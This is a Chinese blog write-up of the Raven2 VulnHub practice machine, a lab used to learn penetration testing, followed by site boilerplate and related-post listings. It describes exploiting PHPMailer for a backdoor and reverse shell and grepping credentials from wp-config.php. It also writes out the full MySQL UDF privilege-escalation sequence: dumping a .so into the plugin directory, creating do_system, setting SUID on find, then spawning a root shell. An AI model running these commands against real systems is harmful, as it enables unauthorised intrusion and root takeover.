Raven2

最新推荐文章于 2024-04-24 10:33:16 发布
最新推荐文章于 2024-04-24 10:33:16 发布
阅读量681 收藏
点赞数
分类专栏: 学习记录 文章标签: 安全 模拟渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49780354/article/details/126973957
版权

这篇比较详细,我就随便写自己看得懂就好了【当要升级系统中的一个库时,并且新库的soname和老库的soname一样,用旧库链接生成的程序使用新库依然能正常运行。这个特性使得在Linux下,升级使得共享库的程序和定位错误变得十分容易】

总结:udf提权

流程: 扫描存活主机,扫描端口,目录扫描,信息收集,漏洞挖掘,漏洞利用,权限提升

攻击机Ip:10.10.10.128

扫描一下活的主机,发现10.10.10.149

 然后仔细扫,发现22,80,111,40134四个端口 

思路:22可以爆破,80需要先信息收集

111上的服务rpcbind

漏洞利用是破坏服务的

 status rpc没搜到

先收集信息

浏览器打开10.10.10.149,发现用到了CMS:wordpress

指纹识别:框架和中间件

 目录爆破

 

枚举的时候发现最重要的是这个 vendor里面有很多信息 ,插件PHPMailer 和版本5.2.16

 

 

 

  

PHPMailer 插件可以搜索漏洞

wordpres 可以用wpscan扫

利用漏洞

修改脚本

目标,后门文件名称,返回攻击机地址和端口,绝对路径 

 

执行脚本

python3 40974.py

监听6677

 访问

http://10.10.10.149/vendor/class.pop3.php

然后再访问http://10.10.10.149/houmen.php

此时就连上了

执行脚本返回完整的shell

 查看内核

 没有找到内核的漏洞,收集密码信息时【find / -name flag*     grep "password" -rn wp-config.php】,得到了mysqlroot的账户和密码,然后查看natstat -ano 发现3306,然后查看运行权限发现root,尝试能不能用udf提权

这关是udf提权的思路

udf提权的要素:若 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 【show variables like '%plugin%';】文件夹下文件夹下才能创建自定义函数

root身份

show global variables like 'secure%';   的结果,参数secure_file_priv 的值不为off或者/tmp

搜索udf提权去照exp

流程:

打开http服务让靶机下载exp 

mysql:

show variables like '%plugin%';

show global variables like 'secure%';

create table dayu(line blob);
insert into dayu values(load_file('/tmp/dayu.so'));
select * from dayu into dumpfile '/usr/lib/mysql/plugin/dayu.so';
create function do_system returns integer soname 'dayu.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');

shell:

find dayu -exec "/bin/sh" \;

 

唯熟唯尔
关注
专栏目录
Raven: 2(第三方漏洞getshell,linux数据库udf提权)
weixin_51423993的博客
01-20 3977
靶机下载地址 https://www.vulnhub.com/entry/raven-2,269/ -ls去掉?成功执行 不连接mysql的root就无权限发到那个目录
raven2
学习!冲冲冲!
06-12 699
raven2
Raven2掠夺者2》 PC端一键下载+预约注册教程
最新发布
weixin_62825745的博客
04-24 813
不过,网石介绍说,这次的新作不是动作RPG,而是正在开发中的全新大型MMORPG,继承了独特的黑暗奇幻世界观。进入官网后,只需要选择PC端后,输入手机号码,勾选【必填】项,完成上述操作后,点击【预登记】,即可完成登记注册。查看奇游,只需要在奇游上查看《Raven 2掠夺者2》并启用优化,即可让玩家们在游戏过程中稳定游玩。玩家们可以在下载好的游戏启动器中,勾选同意服务协议后,点击【PC版本预约注册】可以进行预约注册。玩家们在奇游中启用优化后,点击详细页面,即可点击一键下载。注意,最好下载到全英文路径中~
vulnhub之Raven2
鲨鱼辣椒的博客
08-05 260
信息搜集 扫描网段发现存活主机 扫描IP地址发现开放端口以及服务 浏览器查看网站
vulhub:Raven2
qq_38618396的博客
09-26 554
基本信息 靶机 靶机地址: Download: https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z Download (Mirror): https://download.vulnhub.com/raven/Raven2.ova Download (Torrent): https://download.vulnhub.com/raven/Raven2.ova.torrent ( Magnet) 靶机难度:中等 靶机描述
Raven 2 靶机渗透
banacyo14206的博客
08-24 850
0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 提权辅助工具LinEnum下载:https://do...
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
Raven:Javascript框架
05-05
掠夺Raven是一个创造性的编码框架,在Javascript环境中结合了在openFrameworks,Processing和Flash中看到的意识形态。 类按类型分开,因此可以轻松选择项目中需要框架的哪些部分。 虽然仍处于青春期,但正在进行重大...
raven
03-07
通过键入以下命令来git clone https://github.com/icebox827/raven 在终端中运行bundle install 在终端中运行db:create以创建数据库在终端中运行db:migrate以迁移数据库rails s 开始添加用户并创建事件现场演示技术...
Raven
10-25
Raven
raven-django
06-09
免责声明:这项工作正在进行中,目的是让 Django 相关的东西脱离 raven 本身。 暂时不要用这个。 Raven-Django 是一个 Raven 扩展,它为框架提供完整的开箱即用支持。 Raven 本身是的 Python 客户端。 资源 IRC ...
raven-for-redux:用于Redux的Raven中间件
02-05
。 不推荐使用 Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK的该库的API兼容分支! 用于Redux的Raven中间件 注意:需要Raven> = 3.9.0。 Raven 3.14.0有此库触发 将每个调度动作的类型记录为Rreadcrumbs,并将您的上一个动作和当前Redux状态作为附加上下文。 受启发,但略有。 安装 npm install --save raven-for-redux 用法 浏览器 // store.js import Raven from "raven-js" ; // Or, you mig
【学渗透靶机——Raven2(mysql-udf提权)】
jieli0901227的博客
06-17 412
既然有数据库,还有之前有个wordpress 的blog ,那么查找一下数据库配置文件,浏览完页面没有发现什么, 发现blog 是个wordpress CMS,有个搜索,尝试注入,使用sqlmap 跑了一下,没跑成功;主机开放有22,80,111,39169端口 ,22端口没有收集到账号密码信息,那么暴力ssh 消耗时间成本太大,,优先80端口。nmap漏洞探测没有发现可利用的漏洞信息,只有网站的路径枚举信息,,我们留着,后面查看。查看一下wordpress 的版本,已经限制,不能查看版本。
vulnhub靶场,Raven2
kukudeshuo的博客
07-19 1308
vulnhub靶场,Raven2 环境准备 攻击机:kali(192.168.58.130) 靶机:Raven2(192.168.58.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80、111、56784 浏览器访问目标靶机80端口 就是一个非常普通的页面,没有啥好利用的 网站目录结构扫描 dirb http://19
[B2R]Raven: 2靶机
weixin_43886198的博客
12-13 838
[B2R]Raven: 2 靶场地址 靶场信息 靶场描述 Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach R
Raven2渗透测试
weixin_56537388的博客
06-13 271
查看wp-config.php文件,发现什么都没有,打开wp-login.php,发现url由我们输入的ip地址变成了raven.local我们需要做的是配置电脑的hosts文件使域名解析到我们的kali主机ip地址。靶机下载地址:链接:https://pan.baidu.com/s/1z2uHZHtn4FROnf_av-2voA。发现目录主要由三部分构成:manual,wordpress,vendor,分别进行访问。可以看到,除了默认的1,2,254,那么192.168.182.132就是目标ip。
Raven2靶机练习
SYJ_361的博客
03-27 1252
本文是对Raven2靶机的练习,通过phpmailer**CVE-2016-10033远程代码执行漏洞利用**进行反弹shell,通过控制mysql,对靶机权限进行提权,最后得到靶机里面的flag文件
raven2靶机渗透
my的博客
10-16 217
kaliraven靶机:链接:https://download.vulnhub.com/raven/Raven2.ova。
Raven2--靶机实操详解
qq_61802750的博客
10-14 606
​ 进入wordpress目录,有对应的配置文件wp-config.php,我们打开可以看到数据库密码。这时,服务名、版本号都有了,我们可以进行漏洞利用了。​ 既然我们找到mysql版本,我们就可以考虑使用mysql UDF 提权。​ 访问之后,会在后台生成shell文件,我们访问shell.php文件。​ 可以看到,靶机开放了22、80、111端口,我们优先访问80端口。​ 我们再次用python搭建简单的服务器,把文件下载到靶机里面。​ 找到靶机的ip之后,我们使用nmap扫描靶机的端口。
macos系统上打开VMware打开Raven2.ova是灰色的怎么回事
05-22
2. 确认您的系统是否支持Intel VT-x或AMD-V虚拟化技术。如果您的系统不支持虚拟化技术,则无法使用VMware软件。 3. 启用Intel VT-x或AMD-V虚拟化技术。您可以在计算机的BIOS设置中找到此选项。不同的计算机品牌和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

唯熟唯尔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值